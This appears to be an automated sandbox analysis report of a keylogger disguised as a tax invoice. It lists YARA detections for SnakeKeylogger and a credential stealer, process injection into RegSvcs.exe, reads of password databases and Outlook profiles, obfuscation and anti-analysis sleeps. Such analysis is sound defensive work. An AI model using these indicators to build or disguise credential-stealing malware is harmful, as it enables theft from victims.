Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_054097B0 2_2_054097B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05401A4F 2_2_05401A4F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05401A50 2_2_05401A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540EE5F 2_2_0540EE5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540CE6F 2_2_0540CE6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05406E70 2_2_05406E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540EE70 2_2_0540EE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05404A78 2_2_05404A78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540AE7F 2_2_0540AE7F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540AA00 2_2_0540AA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05406A18 2_2_05406A18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05404620 2_2_05404620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05404622 2_2_05404622
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_054072C8 2_2_054072C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_054072CA 2_2_054072CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05404ED0 2_2_05404ED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540F2F0 2_2_0540F2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_054022FF 2_2_054022FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540CE80 2_2_0540CE80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0540AE90 2_2_0540AE90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05401EA7 2_2_05401EA7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_05401EA8 2_2_05401EA8
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: String function: 00E40AE3 appears 70 times
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: String function: 00E27DE1 appears 36 times
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: String function: 00E48900 appears 42 times
Sample file is different than original file name gathered from version info
Source: (STC) Tax Invoice 25030216_REV.exe, 00000000.00000003.1237139316.0000000003EC3000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs (STC) Tax Invoice 25030216_REV.exe
Source: (STC) Tax Invoice 25030216_REV.exe, 00000000.00000003.1237661746.000000000406D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs (STC) Tax Invoice 25030216_REV.exe
Source: (STC) Tax Invoice 25030216_REV.exe, 00000000.00000002.1238598112.0000000003830000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAubriella.exe4 vs (STC) Tax Invoice 25030216_REV.exe
Uses 32bit PE files
Source: (STC) Tax Invoice 25030216_REV.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Yara signature match
Source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000002.00000002.3700812554.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1238598112.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1238598112.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.1238598112.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: Process Memory Space: (STC) Tax Invoice 25030216_REV.exe PID: 6796, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 604, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.raw.unpack, ---.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.raw.unpack, ---.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.raw.unpack, U---.cs Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/2@3/3
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E8A06A GetLastError,FormatMessageW, 0_2_00E8A06A
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E781CB AdjustTokenPrivileges,CloseHandle, 0_2_00E781CB
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E787E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 0_2_00E787E1
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E8B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 0_2_00E8B3FB
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E9EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 0_2_00E9EE0D
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E983BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear, 0_2_00E983BB
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E24E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 0_2_00E24E89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Mutant created: NULL
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe File created: C:\Users\user\AppData\Local\Temp\aut7810.tmp Jump to behavior
Source: (STC) Tax Invoice 25030216_REV.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: RegSvcs.exe, 00000002.00000002.3702479918.0000000002B92000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3702479918.0000000002BA0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3702479918.0000000002B82000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3702479918.0000000002BC6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3702479918.0000000002BD2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: (STC) Tax Invoice 25030216_REV.exe ReversingLabs: Detection: 77%
Source: (STC) Tax Invoice 25030216_REV.exe Virustotal: Detection: 73%
Source: unknown Process created: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe "C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe"
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe"
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe" Jump to behavior
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: (STC) Tax Invoice 25030216_REV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: (STC) Tax Invoice 25030216_REV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: (STC) Tax Invoice 25030216_REV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: (STC) Tax Invoice 25030216_REV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: (STC) Tax Invoice 25030216_REV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: (STC) Tax Invoice 25030216_REV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: (STC) Tax Invoice 25030216_REV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: wntdll.pdbUGP source: (STC) Tax Invoice 25030216_REV.exe, 00000000.00000003.1236873842.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, (STC) Tax Invoice 25030216_REV.exe, 00000000.00000003.1237139316.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: (STC) Tax Invoice 25030216_REV.exe, 00000000.00000003.1236873842.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, (STC) Tax Invoice 25030216_REV.exe, 00000000.00000003.1237139316.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp
Source: (STC) Tax Invoice 25030216_REV.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: (STC) Tax Invoice 25030216_REV.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: (STC) Tax Invoice 25030216_REV.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: (STC) Tax Invoice 25030216_REV.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: (STC) Tax Invoice 25030216_REV.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E24B37 LoadLibraryA,GetProcAddress, 0_2_00E24B37
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E48945 push ecx; ret 0_2_00E48958
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_027B9C30 push esp; retf 0290h 2_2_027B9D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_027B8926 pushad ; iretd 2_2_027B8927
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_027B8C37 pushfd ; iretd 2_2_027B8C38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_027B8DE7 push esp; iretd 2_2_027B8DE8
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E248D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00E248D7
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00EA5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00EA5376
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E43187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00E43187
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Switches to a custom stack to bypass stack traces
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe API/Special instruction interceptor: Address: 16636BC
Contains long sleeps (>= 3 min)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 600000 Jump to behavior
